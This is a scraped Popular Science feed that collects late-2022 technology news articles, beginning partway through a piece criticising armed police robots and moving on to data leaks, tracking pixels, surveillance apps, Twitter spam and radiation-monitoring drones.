There is relevant history here: In the early hours of July 8, 2016, police in Dallas outfitted an explosive to a Remotec Andros Mark V-A1 and used it to kill an armed suspect. The night of July 7, the suspected shooter had fired on seven police officers, killing five. Dallas police surrounded the suspect and exchanged gunfire during a five-hour standoff in a parking garage. The Dallas Police Department had operated this particular Remotec Andros bomb squad robot since 2008. 

On that night in July, the police attached a bomb to the robot’s manipulator arm. Operated by remote control, the robot’s bomb killed the suspect, while the lifeless robot made it through the encounter with only a damaged manipulator arm. The robot gripper arms are designed to transport and relocate found explosives to a place where they can be safely detonated, sometimes with charges placed by the robot.

While Dallas was a groundbreaking use of remote-control explosives, it fit into a larger pattern of police using human-set explosives, most infamously the 1985 MOVE bombing by Philadelphia Police, when a helicopter delivered two bombs onto a rowhouse and burned it down, as well as 65 other houses. 

Flash bang grenades are a less-lethal weapon used by police and militaries, creating a bright light and loud sound as a way to incapacitate a person before police officers enter a building. These weapons, which are still explosive, can cause injury on contact with skin, and have set fires, including one that burned a home and killed a teenager in Albuquerque, New Mexico in July 2022.

The authorization to arm robots adds one more category of lethal tools to an institution already permitted to do violence on behalf of the state. 

Remote possibilities

Bomb squad robots, which come in a range of models and can costs into the six figures, are a specialized piece of equipment. They are often tethered, with communications and controls running down a large wire to humans, ensuring that the robot can be operated despite interference in wireless signals. One of the ways these robots are used is to facilitate negotiations, with a microphone and speaker allowing police to safely talk to a cornered suspect. In 2015, California Highway Patrol used a bomb squad robot to deliver pizza to a knife-armed man standing over a highway overpass, convincing the man to come down. 

The possibility that these robots could instead be used to kill, as one was in 2016, makes it harder for the robots to be used for non-violent resolution of crises with armed people. In the Supervisors’ hearing, references were made to both the 2017 Mandalay Bay shooting in Las Vegas and the 2022 school shooting in Uvalde, though each is a problem at best tangentially related to armed robots. In Las Vegas, the shooter was immediately encountered by an armed guard, and when police arrived they were able to breach rooms with explosives they carried. In Uvalde, the use of explosives delivered by robot would only have endangered children, who were already waiting for the excruciatingly and fatally long police response to the shooter.

By allowing police to turn a specialized robot into a weapon, San Francisco is solving for a problem that does not meaningfully exist, and is making a genuinely non-lethal tool into a threat. It also sets a precedent for the arming of other machines, like inexpensive quadcopter drones, increasing the distance between police and suspects without leading to arrests or defused situations. 

The post Armed police robots will be a threat to public safety. Here’s why. appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
A massive data leak just cost Meta $275 million https://www.popsci.com/technology/meta-hack-eu-gdpr/ Tue, 29 Nov 2022 15:20:00 +0000 https://www.popsci.com/?p=492753
Close-up of mouse cursor hovering over Facebook website login page
Over 500 million users' personal info was leaked online last year. Deposit Photos

The EU's General Data Protection Regulation (GDPR) law hits Meta for the second time this year.

The post A massive data leak just cost Meta $275 million appeared first on Popular Science.

]]>
Close-up of mouse cursor hovering over Facebook website login page
Over 500 million users' personal info was leaked online last year. Deposit Photos

Yesterday, a security lapse from 2021 cost the Facebook’s parent company, Meta, approximately $275 million thanks to Irish regulators enforcing the EU’s General Data Protection Regulation (GDPR), a law passed in 2018 meant to better safeguard European consumers’ privacy. Last April, hackers collected over 500 million of the social media users’ names, locations, and birth dates via a vast data scraping scheme, and then turned around to sell the information on an online hacking forum. This is a violation of the GDPR’s rule requiring companies so safeguard personal info.

The massive fee is only the latest in a string of heavy financial penalties levied against what was once the world’s most dominant social media site. As The New York Times reports, Ireland’s Data Protection Commission previously fined Meta $400 million in September for its “mistreatment of children’s data,” less than a year after the same authorities charged the company $235 million for various violations related to its messaging service, WhatsApp.

[Related: Meta lays off more than 11,000 employees.]

The EU’s GDPR law is far more restrictive than American legislation when it comes to citizens’ online data privacy. Currently, the US lacks a comprehensive federal data privacy law, although there have been recent pushes for similar regulation. EU law, however, allows for heavier fines that otherwise may not be enacted stateside. Because major tech companies such as Meta, Twitter, and Google all have their EU headquarters located in Ireland, Europe often turns to its Data Protection Commission for enforcement and penalties.

Last year, Facebook rebranded its parent company Meta as part of an attempt to pivot towards CEO Mark Zuckerberg’s goals of realizing his vision of a “metaverse.” Although it’s currently unknown if Meta will appeal this week’s verdict as it has for the previous two decisions, the newest headache comes within weeks of it laying off over 11,000 global employees in what CEO Mark Zuckerberg described as the “one of the worst downturns” in the company’s history. Meta’s stock has dropped precipitously in recent months, and reported a 50-percent decline in quarterly profits last month. “I want to take accountability for these decisions and for how we got here. I know this is tough for everyone, and I’m especially sorry to those impacted,” Zuckerberg wrote in his letter announcing the decision.

The post A massive data leak just cost Meta $275 million appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Twitter overwhelmed by NSFW spam during protests in China https://www.popsci.com/technology/twitter-moderation-protests/ Mon, 28 Nov 2022 20:30:00 +0000 https://www.popsci.com/?p=492055
People hold sheets of blank paper in protest of COVID restriction in mainland as police setup cordon during a vigil in the central district on November 28, 2022 in Hong Kong, China.
Twitter's decimated moderation department is failing recent real world tests. Anthony Kwan/Getty Images

Countless accounts attempted to flood Twitter with NSFW content to obfuscate crucial news from China. With little moderation, experts argue they succeeded.

The post Twitter overwhelmed by NSFW spam during protests in China appeared first on Popular Science.

]]>
People hold sheets of blank paper in protest of COVID restriction in mainland as police setup cordon during a vigil in the central district on November 28, 2022 in Hong Kong, China.
Twitter's decimated moderation department is failing recent real world tests. Anthony Kwan/Getty Images

As a wave of unprecedented citizen protests over China’s revived “zero COVID” response spread throughout major cities, so did an overwhelming flood of “Not Safe For Work” (NSFW) spam posts from what appear to be countless, long-dormant Twitter bot accounts. First highlighted by multiple security researchers over the weekend and subsequently confirmed by The Washington Post this morning, the situation is only the most recent example of Twitter’s dangerously strained oversight and maintenance capabilities in the wake of Elon Musk’s dramatic $44 billion acquisition and internal shakeup last month. Yesterday, Twitter also suffered from a largely un-flagged proliferation of re-uploaded videos of the deadly 2019 mass shooting at a mosque in Christchurch, New Zealand.

[Related: Former Twitter employees warn of platform’s imminent collapse.]

Musk more than halved the company’s global workforce from 7,500 to just over 2,000 since assuming leadership, a reduction many experts and former employees warn opens up one of the world’s most popular social media platforms to numerous content, engineering, and security issues. As one ex-staffer told WaPo, among the many staff cuts and department shutterings included the resignation of “all the China influence operations and analysts,” leaving a massive blindspot across the country.

Overwhelming keyword searches for major cities like Shanghai, Urumqi, and Chengdu with NSFW content makes it much more difficult for people looking for reliable realtime information on developing events in those areas. “50 percent porn, 50 percent protests,” one anonymous US government contractor and China expert described their Twitter feed to WaPo. “Once I got 3 to 4 scrolls into the feed… [it was] all porn.”

[Related: Elon Musk completes purchase of Twitter, fires CEO.]

“Search the name of any major city in Chinese… and you’ll see thousands of nsfw escort ads,” Mengyu Dong, a Stanford University researcher, tweeted on Sunday. Dong continued by explaining that, although similar ads have existed for years, they have not been shared nearly as frequently as over this past weekend, and recent posts often came from years’ long dormant accounts. Analysis from another account specializing in publicly available Chinese data seemed to show that suspected spam accounts at one point comprised over 95 percent of the “Latest” results after searching “Beijing” in Chinese, adding that, “They tweet at a high, steady rate throughout the day, suggesting automation.”

On Friday, Musk tweeted screenshots of presentation slides he claimed were from a recent “company talk,” one of which included the caption “Reported impersonation spiked, then fell” alongside a line graph citing “Twitter Internal” data.

The post Twitter overwhelmed by NSFW spam during protests in China appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Major tax-filing sites routinely shared users’ financial info with Facebook https://www.popsci.com/technology/tax-prep-share-information-facebook/ Tue, 22 Nov 2022 05:00:00 +0000 https://www.popsci.com/?p=489884
Tax form 1040 with crumpled up forms, glasses, pink eraser and pencil
Despite the abuse, the financial landscape provides few alternatives. Deposit Photos

A new investigation reveals how companies share users' most personal financial data with advertisers.

The post Major tax-filing sites routinely shared users’ financial info with Facebook appeared first on Popular Science.

]]>
Tax form 1040 with crumpled up forms, glasses, pink eraser and pencil
Despite the abuse, the financial landscape provides few alternatives. Deposit Photos

The annual tax season looms large for Americans just after the holidays, and millions will soon turn to the $11 billion third-party filing industry to help make sense of their most recent finances—but a damning new exposé has revealed that some of the most popular tax sites routinely offered customers’ most private financial and personal data to Facebook without their knowledge thanks to a tiny, nearly ubiquitous surveillance code.

A deep dive from The Markup and The Verge published this morning explains in detail how some of the country’s most popular tax prep software makers, including H&R Block, TaxSlayer, and TaxAct, utilized the popular Meta Pixel tracking tool to amass sensitive data including names, email addresses, incomes, refunds, filing statuses, and even dependents’ college scholarship amounts from annual filings. Designed and made freely available by Facebook, the code marks a tiny pixel on participating websites that subsequently sends a host of information regarding people’s digital activity to the Meta. Both Meta and businesses that opt-in benefit from the tracking, because it allows them to amass consumer advertiser profiles while personalizing ads to their supposed tastes. Approximately one-third of the 80,000 most popular websites utilize Meta Pixel (disclosure: PopSci included), and overall tracking cookie ecosystem provides the vast majority of revenue for many companies online.

[Related: Hospital patients say a Facebook-linked ad tool violated their privacy.]

However, The Markup‘s most recent investigation into tax filing services’ surveillance presents a particularly egregious and invasive example of data harvesting. For one thing, much of the information amassed by the filing companies aren’t default Meta Pixel configurations, meaning that someone affiliated with these businesses is purposefully going into the settings to toggle specific information gathering parameters. For example, pixels embedded by TaxAct and TaxSlayer used something called “automatic advanced matching,” which scans forms for fields potentially containing personally identifiable info like names, phone numbers, and emails, then sends that info to Meta, according to the report. Mandi Matlock, a Harvard Law School lecturer on tax law, told The Markup that its findings reveal taxpayers are “providing some of the most sensitive information that they own, and it’s being exploited,” adding, “This is appalling. It truly is.”

As the report notes, unfortunately the US financial landscape offers very few alternatives for tax filers other than to turn to these third-party companies. The IRS currently only allows free online tax filing through a governmental portal for people earning $73,000 or less per year. While some private services offer similar free filing, they often obfuscate the option to discourage people from selecting them. The combined result leaves many Americans all-but-forced to pay for these filing services, now with the knowledge that much of their most sensitive data may be harvested by tech companies.

[Related: How data brokers threaten your privacy.]

In a statement provided to PopSci via email, a Meta spokesperson cautioned, “Advertisers should not send sensitive information about people through our Business Tools. Doing so is against our policies and we educate advertisers on properly setting up Business tools to prevent this from occurring. Our system is designed to filter out potentially sensitive data it is able to detect.”

Since the joint investigation, several of the surveyed sites of since deactivated some of Meta Pixel’s features, according to The Markup. TaxAct continued to send dependents’ names to Facebook, while H&R Block still relayed health savings and college tuition grant amounts. According to legal experts, these services must provide clear and concise consent agreements offering exactly who receives filing information, and how it is used. None of the companies’ privacy agreements mentioned Meta, Facebook, or Google (who also receives some of this data), something Nina Olson, executive director of the nonprofit Center for Taxpayer Rights, argues could be a major regulation infractions.

“Do they have a list saying they’re going to disclose the refund amounts, and your children, and your whatever to Facebook?” she said. “If not, she said, they may be in violation.”

Update 11/23/22: The Markup reports that since publishing its report, both H&R Block and TaxAct have removed the Meta Pixel tracking code from their filing websites.

The post Major tax-filing sites routinely shared users’ financial info with Facebook appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Cybersecurity experts blow the whistle on official apps for World Cup attendees https://www.popsci.com/technology/fifa-2022-world-cup-apps/ Thu, 17 Nov 2022 21:00:00 +0000 https://www.popsci.com/?p=488429
Official Adidas FIFA World Cup soccer ball on green grass in night in stadium
Experts suggest Qatar's World Cup attendants use a burner phone. Deposit Photos

Just days before kickoff, experts are urging World Cup attendees to not use the host Qatar's apps.

The post Cybersecurity experts blow the whistle on official apps for World Cup attendees appeared first on Popular Science.

]]>
Official Adidas FIFA World Cup soccer ball on green grass in night in stadium
Experts suggest Qatar's World Cup attendants use a burner phone. Deposit Photos

The FIFA 2022 World Cup is set to begin in a matter of days, but European cybersecurity experts are urging sports fans traveling to Qatar to think twice before downloading the event’s official event apps. Authorities from Germany, Norway, and France have all recently issued notices about the nation’s ticket and accommodations app, Hayya, as well as its COVID-19 contact tracing app, Ehteraz, citing the highly suspicious levels of personal data access each requires. According to their Google Play Store listings, Hayya is available under the banner of Qatar’s Supreme Committee for Delivery & Legacy, while Ehteraz is owned by the Ministry of Interior.

Both apps—which Qatar reportedly requires for entry into World Cup events—request private information that far oversteps the European nations’ own regulations regarding fundamental human rights and data protections. These permission grants include the ability to amass phone call metadata, which is often used to pinpoint geographic location and other device fingerprints. The apps also prevent users’ phones from entering into Sleep mode, thus preventing the disabling or silencing of messaging and phone calls. Both Hayya and Ehteraz could potentially transmit phone data to a central server instead of letting it remain locally on devices, making that information susceptible to third-party monitoring.

[Related: Egypt’s official COP27 app may be greenwashed spyware.]

“We are alarmed by the extensive access the apps require,” Norway’s Data Protection Authority said in a statement translated from Norwegian provided by Information Security Media Group, a multimedia company focused on information security, risk management, privacy and fraud. The Data Protection Authority also added that, “There is a real possibility that visitors to Qatar, and especially vulnerable groups, will be monitored by the Qatari authorities.”

As a potential workaround, experts suggest World Cup attendees ostensibly bring a blank burner phone solely for downloading Hayya and Ehteraz, so as to limit any private data local authorities could potentially access. Information Security Media Group also advises against connecting visitors’ standard phones to open Wi-Fi networks.

Human rights advocacy groups such as Amnesty International have voiced concerns over FIFA’s 2010 decision to host the World Cup in Qatar for years, citing the its history of migrant labor abuse, intensely discriminatory LGBTQ+ laws, as well as various other autocratic issues. The World Cup takes place between November 20 and December 18.

The post Cybersecurity experts blow the whistle on official apps for World Cup attendees appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
DuckDuckGo’s Android app will now protect your data from sneaky trackers https://www.popsci.com/technology/duckduckgo-app-tracking-protection-android/ Wed, 16 Nov 2022 17:00:00 +0000 https://www.popsci.com/?p=487725
DuckDuckGo illustration of App Tracking Protection feature blocking Google profile keywords
DuckDuckGo's campaign for online privacy continues. DuckDuckGo

The latest update opens up more privacy options to the world's most popular smartphone OS.

The post DuckDuckGo’s Android app will now protect your data from sneaky trackers appeared first on Popular Science.

]]>
DuckDuckGo illustration of App Tracking Protection feature blocking Google profile keywords
DuckDuckGo's campaign for online privacy continues. DuckDuckGo

The stalwart privacy advocates at DuckDuckGo just opened up one of their most promising online tools to the majority of the world’s smartphones. This morning, the company announced its popular App Tracking Protection beta feature is now available for all Android app users, alongside some updates and expansions to the existing tool. App Tracking Protection is a free component of DuckDuckGo’s Android app that helps users block third-party trackers in their phone’s various apps, allowing for more comprehensive privacy and fewer of those off-putting targeted ads for products you just searched for the other day.

[Related: DuckDuckGo’s private browser is now available to all Mac users.]

According to the company’s research, Android users have around 35 apps on their phones garnering between 1,000 and 2,000 tracking attempts each day via surreptitious interactions with over 70 various tracking companies. These businesses, including giants like Google and Meta, compile detailed consumer profiles that include aspects like exact geolocations, email addresses, time zones, phone numbers, travel patterns, as well as even your smartphone’s device make and model, screen resolution, language, and internet provider. These vast data portfolios are coveted by third-party advertisers, data brokers, and even governments, and are frequently sold to them at huge profit margins, resulting in a massive consumerist surveillance ecosystem built upon people’s most personal details.

Tools like App Tracking Protection, however, provide a welcome barrier to these invasive tactics—this case, a local VPN connection ensures that your app data doesn’t even go to DuckDuckGo’s own remote servers, much less anyone else’s. DuckDuckGo in Android also provides a real-time review of the feature’s results, including what tracking networks are involved with each app, as well as the data they have a history of collecting. You can even get automatically generated summaries if notifications are enabled.

[Related: Anyone can now sign up for DuckDuckGo’s private email service.]

The Android App Tracking Protection beta rollout is the latest in a line of online privacy expansions available from DuckDuckGo, including a standalone browser for Mac users and an email service designed specifically to block hidden trackers. To activate the new feature, Android users simply need to open the Settings tab in their DuckDuckGo app, select App Tracking Protection under the More from DuckDuckGo section, and follow the subsequent onscreen instructions.

The post DuckDuckGo’s Android app will now protect your data from sneaky trackers appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Russian code found in CDC and US Army apps, according to new report https://www.popsci.com/technology/pushwoosh-russian-code/ Tue, 15 Nov 2022 19:00:00 +0000 https://www.popsci.com/?p=487121
close-up of hand browsing iPad App Store screen with download options
Pushwhoosh is based Siberian town of Novosibirsk, but claims otherwise. Deposit Photos

A new Reuters report claims that a Siberia-based company, Pushwoosh, misled clients about being based in the US.

The post Russian code found in CDC and US Army apps, according to new report appeared first on Popular Science.

]]>
close-up of hand browsing iPad App Store screen with download options
Pushwhoosh is based Siberian town of Novosibirsk, but claims otherwise. Deposit Photos

The app software company, Pushwoosh, boasts an impressive roster of clients including the Center for Disease Control (CDC), the UK’s Labour Party, as well as the US Army. It’s offered coding and data processing support for over 8,000 apps, a venture that subsequently allowed them to profile countless users’ activity according to the access granted them—although its official privacy policy states that it doesn’t not collect or store any sensitive information. However, Pushwoosh—with a $2.4 million revenue stream—doesn’t appear to be based in Washington, DC, per previous claims—or California, or Maryland, for that matter. In actuality, official documents point towards Pushwoosh being located in the Russian city of Novosibirsk in Siberia.

The knowledge comes per an exclusive report from Reuters yesterday, which lays out how Pushwoosh’s activities are raising concerns for the company’s often high profile customers overseeing troves of sensitive user information. Reuters does not claim that a breach of privacy has taken place, but does point to the Russian intelligence agencies’ far-reaching authority and previous orders to companies to share their data with the government. “I am proud to be Russian and I would never hide this,” Pushwoosh’s founder, Max Konev, wrote Reuters via email, adding that the company “has no connection with the Russian government of any kind.”

[Related: Egypt’s official COP27 app may be greenwashed spyware.]

According to Reuters, a deep dive into Pushwoosh’s online paper trail turned up a host of suspicious activity. The company listed multiple physical addresses across the nation, one of which was simply a Maryland home owned by Konev’s friend and one California address that doesn’t exist according to city officials. There were also omissions of Russian relations in at least five annual financial filings and at least two associated LinkedIn profiles that do not belong to real people. Konev claims the two accounts were created in 2018 by a marketing company he hired to boost social media sales, not to hide the company country of origin.

Although the investigation does not indicate Pushwoosh has actively engaged in malicious surveillance, its misleading stateside addresses and potential susceptibility to leaks or hacking could be in violation of US Federal Trade Commission (FTC) laws, or be cause enough to trigger sanctions. Both the US Army and the CDC stated they have removed Pushwoosh software from their apps, although that likely affects only a fraction of the company’s 2.3 billion devices it claims are in its databases. Pushwoosh’s clients also include the National Rifle Association and the Union of European Football Associations, per Reuters‘ report. Google and Apple have yet to comment on the situation, apart from claims that users’ security and privacy are a “huge focus” of their operations.

The post Russian code found in CDC and US Army apps, according to new report appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Egypt’s official COP27 summit app may be the ‘cartoon super-villain’ of spyware https://www.popsci.com/technology/official-cop27-summit-app-spyware-egypt/ Thu, 10 Nov 2022 17:00:00 +0000 https://www.popsci.com/?p=486023
Smartphone displaying COP27 app logo
Think twice about downloading it. Sean Gallup/Getty Images

Officials say more than 5,000 attendees have downloaded the app requiring unprecedented access to personal data.

The post Egypt’s official COP27 summit app may be the ‘cartoon super-villain’ of spyware appeared first on Popular Science.

]]>
Smartphone displaying COP27 app logo
Think twice about downloading it. Sean Gallup/Getty Images

The United Nations’ 27th Conference of Parties (COP27) climate summit is currently underway in the Egyptian resort city of Sharm el-Sheikh. But, the host country’s official event app appears to be nothing more than almost comically egregious spyware, according to multiple reports.

According to security experts and attendees at the annual gathering of world government leaders, scientists, and environmental activists, the app’s permissions requirements grant local authorities an alarming amount of access to users’ smartphone data. Emails, photos, and even the ability to pinpoint geographic locations are among the details available to Egypt’s ministry of communications and information technology, alongside gateways to phones’ cameras, microphones, and Bluetooth capabilities.

[Read: COP27 climate goals: 1.5 degrees Celsius and beyond.]

“You can now download the official #COP27 mobile app but you must give your full name, email address, mobile number, nationality and passport number. Also you must enable location tracking,” Hossam Bahgat, leader of the Egyptian Initiative for Personal Rights, tweeted ahead of the summit last month, along with a screenshot of the app’s welcome page featuring a photo of Egyptian president, Abdel Fattah El-Sisi. Per the app’s own wording, the Egyptian government also “reserves the right to access customer accounts for technical and administrative purposes and for security reasons.”

Speaking with The Guardian earlier this week, the Electronic Frontier Foundation’s advocacy director, Gennie Gebhart, described Egypt’s COP27 smartphone offering as “a cartoon super-villain of an app,” explaining that the required permissions are “unnecessary” for the app’s operation, thus heavily suggesting the government is attempting to surveil summit attendees.

[Related: The past 8 years have been the hottest on human record.]

Since the 2011 uprising, the Egyptian government has worked to expand and maintain a vast digital law enforcement apparatus, which it uses to surveil citizens, political activists, and dissidents. Strategies include utilizing deep packet inspection, which grants authorities the ability to monitor any internet traffic within a network, and the online censoring of over 500 websites including the country’s only independent news source. Ahead of the COP27 summit, Egyptian authorities oversaw a series of mass arrests in an attempt to identify political activists. The country currently has over 65,000 jailed political prisoners.

Although cybersecurity teams aiding the world’s heads of state likely identified the egregious privacy loopholes in Egypt’s COP27 app, The Guardian notes it has already been downloaded at least 5,000 times by various attendees. It’s easy to envision the Egyptian government counting on these lapses in judgment as a way to keep tabs on perceived domestic and foreign threats. It’s as good a reminder as any that you should probably take a moment to reinforce your own online defenses against malicious actors.

The post Egypt’s official COP27 summit app may be the ‘cartoon super-villain’ of spyware appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
How drones are helping monitor Kyrgyzstan’s radioactive legacy https://www.popsci.com/technology/kyrgyzstan-drone-radiation-monitoring/ Thu, 10 Nov 2022 12:00:00 +0000 https://www.popsci.com/?p=485897
Drones photo
Third Element Aviation

An accident in 1958 and more than two decades of uranium mining led to nuclear contamination. Now, airborne monitoring is helping.

The post How drones are helping monitor Kyrgyzstan’s radioactive legacy appeared first on Popular Science.

]]>
Drones photo
Third Element Aviation

Above the town of Mailuu Suu in western Kyrgyzstan, the International Atomic Energy Agency is flying drones to monitor for radiation. For 22 years, from 1946 to 1968, people in Mailuu Suu mined and processed uranium ore for the Soviet Union. Decades later, waste still remains, and monitoring is essential to ensure that people can live safely in the environment actively contaminated by production of nuclear materials. The drone flights, captured in a video shared online November 4, are a way for new technology to ease the burden of monitoring risk.

The town of Mailuu Suu was intimately tied to the extraction of nuclear material in the Soviet Union, which meant that the town was unlisted on maps, closed to outsiders, and officially logged only as “Mailbox 200.” In the Cold War climate, where espionage was essential for superpowers tracking and estimating the size of nuclear weapons arsenals, this made some degree of sense. It also meant that the protective geography of the town, in a river valley in a region prone to landslides and earthquakes, helped keep residents in place, even as it led to risky decisions like burying waste nearby the village.

An accident in 1958

In 1958, heavy rainfall and seismic activity caused a dam failure that pushed 14 million cubic feet of radioactive waste into the Maylu-Suu river that runs through the town. Downstream, the river flows into the Ferghana valley of Central Asia, an area split between Kyrgyzstan, Uzbekistan, and Tajikistan, and a region home to 14 million people. The 1958 disaster contaminated the river and areas downstream, leaving a visceral legacy in the memories of those who witnessed it.

The concern for the town, the government of Kyrgyzstan, and international observers, is that such a disaster could strike again. Much of the waste from the site exists in “tailings,” or the sludge left over from extracting uranium ore and processing it with chemicals. In addition to the 23 sites of tailings, there are 13 sites of radioactive rock around the city. Climate change can cause a shift in rain patterns and an increase in storm severity, exacerbating the risk posed by these sites to the whole region.

Eventually, remediation will be needed to tackle all of the sites, ensuring they no longer pose a threat to people in the area or elsewhere. Before that, there is the constant work of monitoring the waste, which has traditionally been done by humans on foot or, rarely, helicopters. Now, uncrewed aerial vehicles (UAVS) or drones are being brought to bear on the problem.

“The tailor-made UAV-based gamma spectrometer will make it possible for experts to explore sites without the need to trek through difficult terrain with lots of gear,” Sven Altfelder, an IAEA remediation safety specialist, said in a June 2021 release. “By using the UAV to conduct monitoring duties, experts in the region will be able to easily gather the necessary data quickly, while avoiding potential physical and radiological risks altogether.”

A good job for a drone

Drone monitoring reduces the labor and risk of checking out the area on foot. Thanks to the ability of drone-borne sensors to carry and upload data, it also allows for a more complete picture of radioactive risk and sites, mapped in three dimensions by the flying robot.

Another perk is that drones can detect new or unmarked sites, since thorough scanning of the region by air makes it easier to find mislabeled or unknown waste sites. Drone piloting is also easier and cheaper than using crewed aircraft, and drone pilot training has fewer hurdles than that of pilots who actually fly inside the craft they operate.

The technology was tested in Germany in 2020, showing that the drone can produce a reliable and accurate radiation map of partially remediated sites. This work was funded by the European Union and the German government, which has a specific tie to Mailuu Suu. When the town was set up as a closed community in 1946, among the people relocated to work in it were ethnic Germans, alongside Crimean Tatars and Russian soldiers who had surrendered during World War II.

[Related: Why do nuclear power plants need electricity to stay safe?]

With proof that the drone can be used to successfully monitor the sites in Kyrgyzstan, the hope is that experts in the country, and other Central Asian countries, can be trained to take on the work. The project is supported by the governments of Kyrgyzstan, Kazakhstan, Uzbekistan, and Tajikistan.

“We will be able to use the results obtained by the UAV to explain remediation results to the local population and demonstrate that those areas are now safe,” said Azamat Mambetov, State Secretary of the Kyrgyzstan Ministry of Emergency Situations, in the June release.

The drone monitoring will aid in guiding remediation and proving its success. This, in turn, could expand possibilities in the region, with some hope from the IAEA that a remediated and safe Mailu Suu could not just stop being a risk, but could even become a destination for travelers and tourists, eager to behold the natural beauty.

Watch a video about it below:

The post How drones are helping monitor Kyrgyzstan’s radioactive legacy appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Apple knows exactly how much you use its apps https://www.popsci.com/technology/apple-privacy-app-study/ Wed, 09 Nov 2022 23:00:00 +0000 https://www.popsci.com/?p=485645
Interior of skylights of Apple Store on Fifth Avenue
The news isn't exactly surprising. Deposit Photos

New research reveals a startling level of data monitoring within the App Store and company apps like Books and Apple Music.

The post Apple knows exactly how much you use its apps appeared first on Popular Science.

]]>
Interior of skylights of Apple Store on Fifth Avenue
The news isn't exactly surprising. Deposit Photos

Apple often boasts of its commitment to user privacy and data anonymization, and in many instances, the tech giant does provide ways for consumers to guard against a fair amount of invasive tactics like ad tracking. But as a new investigation reveals, courtesy of Gizmodo, that dedication to personal digital preference largely stops where the company’s own apps are concerned. The new research, co-conducted by two security researchers at the software company Mysk, shows the level of scrutiny iPhone users receive while accessing official apps like Apple TV, Music, Books, and Stocks is both startling detailed and potentially worrisome.

[Related: Privacy changes dig into Meta’s profits.]

According the report, Apple’s most popular native apps, including the App Store itself, track copious amounts of user data, regardless of whether not iPhone owners toggled their Apple Analytics privacy setting. When switched “on,” the iPhone Analytics tool supposedly will “disable the sharing of Device Analytics altogether,” per the company’s own words. Upon delving further, Gizmodo relays that Mysk “found the analytics control and other privacy settings had no obvious effect on Apple’s data collection—the tracking remained the same whether iPhone Analytics was switched on or off.”

When it comes to what Apple harvests, it’s probably simpler to try to find the things it doesn’t gather. According to Mysk’s research, the Big Tech giant logged information on “every single thing” you do in real time—what you tap on, what apps you search for, and how long looked at an app and how you first discovered it. “The app sent details [to Apple] about you and your device as well, including ID numbers, what kind of phone you’re using, your screen resolution, your keyboard languages, how you’re connected to the internet,” explained Gizmodo, adding that this is usually the sort of stuff commonly utilized during device fingerprinting.

[Related: Keep tabs on how much access your computer’s apps have to your system.]

Apple’s breadth and detail of coverage is extraordinary compared to other comparable online experiences—Mysk’s investigators cite Microsoft Edge and Google Chrome for comparison as two apps that don’t send any data to their parents companies when analytics are disabled.

There’s really no way to know for sure how much of this data Apple actually analyzes, and for what purposes. This remains an incredibly important reminder of how few truly “private” spaces are online, including those run by the company that once erected “Privacy. That’s iPhone.” billboards.

The post Apple knows exactly how much you use its apps appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Instagram is down for some users—here’s what we know so far https://www.popsci.com/technology/instagram-outage-suspensions/ Mon, 31 Oct 2022 15:50:53 +0000 https://www.popsci.com/?p=482468
You are not alone.
You are not alone. Deposit Photos

Another day, another case of social media chaos.

The post Instagram is down for some users—here’s what we know so far appeared first on Popular Science.

]]>
You are not alone.
You are not alone. Deposit Photos

UPDATE (November 1, 2022): Instagram announced via Twitter it resolved the issue at approximately 6pm ET on 10/31, citing a “bug” which caused “people in different parts of the world to have issues accessing their accounts and caused a temporary change for some in number of followers.”

Twitter won the award last week for most chaotic social media platform—but Instagram may be pushing for the title today. Earlier this morning, Instagram confirmed via tweet that many users are experiencing accessibility issues in the form of seemingly random account suspensions. “We’re looking into it and apologize for the inconvenience,” the message concludes alongside the hashtag “#instagramdown.”

As The Verge notes, many prominent Instagram accounts’ follower totals have dropped precipitously, with the social media company’s official account down over a million users since yesterday. Multiple users are taking to other social media platforms such as Twitter to detail their Instagram woes, usually alongside screenshots detailing their suspensions, which appear to be the generic flagged page seen when hit with the censor. As of 10:19 a.m. EDT, 7,000 reports of issues with the app have popped up.

One PopSci‘s staffer is experiencing the problem—their Instagram account was randomly and inexplicably suspended for roughly 2-3 hours before being restored, although they still are seeing app issues.

Instagram is owned by Mark Zuckerberg’s Meta, the same parent company as Facebook.

The post Instagram is down for some users—here’s what we know so far appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Booking a trip online? Here’s what tracking cookies could be gathering about your family. https://www.popsci.com/technology/mozilla-blog-tracking-cookies/ Mon, 24 Oct 2022 22:00:00 +0000 https://www.popsci.com/?p=480285
firefox browser on phone
DEPOSIT PHOTOS

A Mozilla product manager breaks down what cookies you might pick up just from booking a vacation.

The post Booking a trip online? Here’s what tracking cookies could be gathering about your family. appeared first on Popular Science.

]]>
firefox browser on phone
DEPOSIT PHOTOS

In a blog post published today, Mozilla product manager Karen Kim detailed an experiment she conducted to see how many tracking cookies got installed in her browser when she researched a family trip for two adults and two children to Costa Rica. 

By visiting multiple flight, hotel, and car rental comparison sites, and using Google to find sightseeing information, guidance on traveling with children, and product recommendations, Kim picked up a total of 1,620 cookies—around 20 percent of which were third-party tracking cookies from analytics and ad companies like Google and Facebook. Kim concluded that there was something “insidious” about the whole situation, saying: “In the act of planning a trip online without anti-tracking protection, someone out there now knows about the ages of your children, your partner’s interests, which family scuba lesson you’ve booked and with whom.”

While some cookies are crucial for keeping modern websites operating, others are a bit more nefarious. Good cookies track things like your preferred language and the contents of your shopping cart, and keep you logged in when you browse around a site. No one really has any issues with these kinds of cookies—they are a necessary part of the modern web. Without them, all but the most basic websites would cease to function. 

